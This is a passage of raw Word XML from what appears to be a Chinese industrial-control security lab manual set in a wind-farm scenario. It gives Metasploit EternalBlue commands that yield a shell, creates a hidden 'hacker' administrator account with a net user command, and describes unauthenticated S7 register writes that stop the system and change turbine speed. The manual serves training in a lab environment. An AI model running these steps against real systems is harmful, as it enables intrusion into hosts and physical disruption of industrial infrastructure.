          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ms17-010,准备kali环境，并在终端中输入命令：msfconsole,运行metasploit如下；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B925B56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094095" cy="2754630"/>
            <wp:effectExtent l="0" t="0" r="1905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6408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终端中输入命令：search ms17_010，查看有哪些漏洞利用模块，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB5359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070600" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="635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DFA7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先加载永恒之蓝扫描模块，判断是否存在漏洞，终端中输入命令：use auxiliary/scanner/smb/smb_ms17_010，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53BEFC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052820" cy="641350"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635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0335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查看配置选项，输入命令：show options,如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D0F56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019800" cy="1441450"/>
            <wp:effectExtent l="0" t="0" r="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3EE6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设置目标IP，输入命令：set rhosts 10.25.153.193(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IP可参考场景中当次实验的风力发电上位机IP地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>),如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3E770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013450" cy="367665"/>
            <wp:effectExtent l="0" t="0" r="6350" b="133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87D4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执行扫描，输入命令：run,出现以下情况，说漏洞存在，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C2AAB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098540" cy="519430"/>
            <wp:effectExtent l="0" t="0" r="16510" b="1397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BE38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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加载ms17-010攻击模块，输入命令：use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC7CC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/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 exploit/windows/smb/ms17_010_eternalblue，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CFB57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002020" cy="248920"/>
            <wp:effectExtent l="0" t="0" r="17780" b="177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A384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设置攻击目标IP，输入命令：set rhosts 10.25.153.193，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6DE23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5947410" cy="1945005"/>
            <wp:effectExtent l="0" t="0" r="15240" b="171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53D8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设置攻击载荷，输入命令：set payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC0AD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars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windows/x64/meterpreter/bind_tcp，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE202C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5916295" cy="400685"/>
            <wp:effectExtent l="0" t="0" r="8255" b="184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524D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执行攻击，输入命令：exploit，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56CB58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5949950" cy="2941955"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1079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ABF2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攻击成功，得到shell，如下图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5746DE2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6082030" cy="1227455"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1079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5FD4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为靶机创建一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组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>新的操作系统用户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/密码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，输入命令net user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hacker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111 /add；将用户添加到admin组，输入命令net localgroup administrators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hacker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/add；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D4CBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>创建的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hacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/111登录RDP，登录成功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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDE7BD">
      <w:pPr>
        <w:pStyle w:val="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实验二 获取控制器相关信息，版本号、CPU型号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A98472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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</w:rPr>
        <w:t>利用s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>协议模拟器进行连接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，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在IP处输入下位机IP地址，点击connect连接，选择下面System Info即可看到下位机版本号、型号等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0046F34C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="2980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9142" cy="298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43A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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获取到版本为：V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5.4.5  CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>型号：C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">PU414-3PN/DP  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075524F">
      <w:pPr>
        <w:pStyle w:val="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实验三 修改相关点位状态，让系统停止运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C277D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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38169519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S7协议在设计之初，仅仅考虑了功能实现、提高效率、提高可靠性等方面，而很少考虑安全性问题，比如缺乏认证和授权。认证的目的是保证收到的信息来自合法的用户，未认证用户向设备发送控制命令不会被执行。在S7协议的通信过程中，没有任何认证方面的相关定义，攻击者只需要找到一个合法的地址就可以使用功能码并建立一个S7通信会话，从而扰乱整个或者部分控制过程。授权是保证不同的特权操作由拥有不同权限的认证用户来完成，这样可大大降低误操作与内部攻击的概率。目前，S7协议没有基于角色的访问控制机制，也没有对用户进行分类，没有对用户的权限进行划分，这会导致任意用户可以执行任意功能。S7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400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PLC采用S7协议与第三方软件（例如组态王）进行通讯，无需身份认证，构造符合S7协议规则的包可以对PLC进行相关攻击。或者采用第三方连接工具进行攻击，在本实验课程中，完成对指定PLC寄存器地址值的定点攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0461B7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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77200931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本实验所需环境如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDDDFB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靶机操作系统为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938DD36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攻击机为Windows 7 64位，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Snap7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>client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 xml:space="preserve"> D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>emo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>等工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60703E72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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E057E1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S7协议在设计之初，仅仅考虑了功能实现、提高效率、提高可靠性等方面，而很少考虑安全性问题，比如缺乏认证和授权。认证的目的是保证收到的信息来自合法的用户，未认证用户向设备发送控制命令不会被执行。在S7协议的通信过程中，没有任何认证方面的相关定义，攻击者只需要找到一个合法的地址就可以使用功能码并建立一个S7通信会话，从而扰乱整个或者部分控制过程。授权是保证不同的特权操作由拥有不同权限的认证用户来完成，这样可大大降低误操作与内部攻击的概率。目前，S7协议没有基于角色的访问控制机制，也没有对用户进行分类，没有对用户的权限进行划分，这会导致任意用户可以执行任意功能。S7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400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PLC采用S7协议与第三方软件（例如组态王）进行通讯，无需身份认证，构造符合S7协议规则的包可以对PLC进行相关攻击。或者采用第三方连接工具进行攻击，在本实验课程中，完成对指定PLC寄存器地址值的定点攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653C6B8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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174182D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本实验所需环境如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAD047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靶机操作系统为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B0EC3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攻击机为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBCEF74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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D49F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>协议模拟器进行连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w: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在IP处输入下位机IP地址，点击connect。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0308B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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由提示可以知道，需要将M寄存器地址为0字节第二位状态修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E94AA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6115685" cy="3773805"/>
            <wp:effectExtent l="0" t="0" r="18415" b="171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6503">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>箭头所指部分可以控制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>当写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>系统启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>写入0时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>系统停止，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0712362E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD0C7A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>箭头所指部分可以控制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>当写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>系统启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>写入0时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>系统停止，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000E7ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B48E66">
      <w:pPr>
        <w:ind w:firstLine="120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="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>攻击后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D28913"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0" distR="0">
            <wp:extent cx="1731645" cy="1648460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1218" cy="1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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1635125" cy="1662430"/>
            <wp:effectExtent l="0" t="0" r="317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17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D961">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322E5488">
      <w:pPr>
        <w:pStyle w:val="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实验四 通过协议或者工具篡改风机转速，改为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>转/分钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595BD5C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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提示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>需要同时修改M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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>和M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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>才可以改变风机转速。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152EACE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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D89A9C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S7协议在设计之初，仅仅考虑了功能实现、提高效率、提高可靠性等方面，而很少考虑安全性问题，比如缺乏认证和授权。认证的目的是保证收到的信息来自合法的用户，未认证用户向设备发送控制命令不会被执行。在S7协议的通信过程中，没有任何认证方面的相关定义，攻击者只需要找到一个合法的地址就可以使用功能码并建立一个S7通信会话，从而扰乱整个或者部分控制过程。授权是保证不同的特权操作由拥有不同权限的认证用户来完成，这样可大大降低误操作与内部攻击的概率。目前，S7协议没有基于角色的访问控制机制，也没有对用户进行分类，没有对用户的权限进行划分，这会导致任意用户可以执行任意功能。S7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400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PLC采用S7协议与第三方软件（例如组态王）进行通讯，无需身份认证，构造符合S7协议规则的包可以对PLC进行相关攻击。或者采用第三方连接工具进行攻击，在本实验课程中，完成对指定PLC寄存器地址值的定点攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A34E8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 w14:paraId="6F00B43C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 w14:paraId="6AA47247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</w:p>
    <w:p w14:paraId="563002BA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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD50A3B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本实验所需环境如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2C388">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left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靶机操作系统为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F5A1D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攻击机为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D17FC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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB5694"/>
    <w:p w14:paraId="6FD26C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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根据提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>需要同时修改M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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>和M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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>才可以改变风机转速。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081A505"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构造S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>报文</w:t>
      </w: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格式，构造协议包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CF2D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
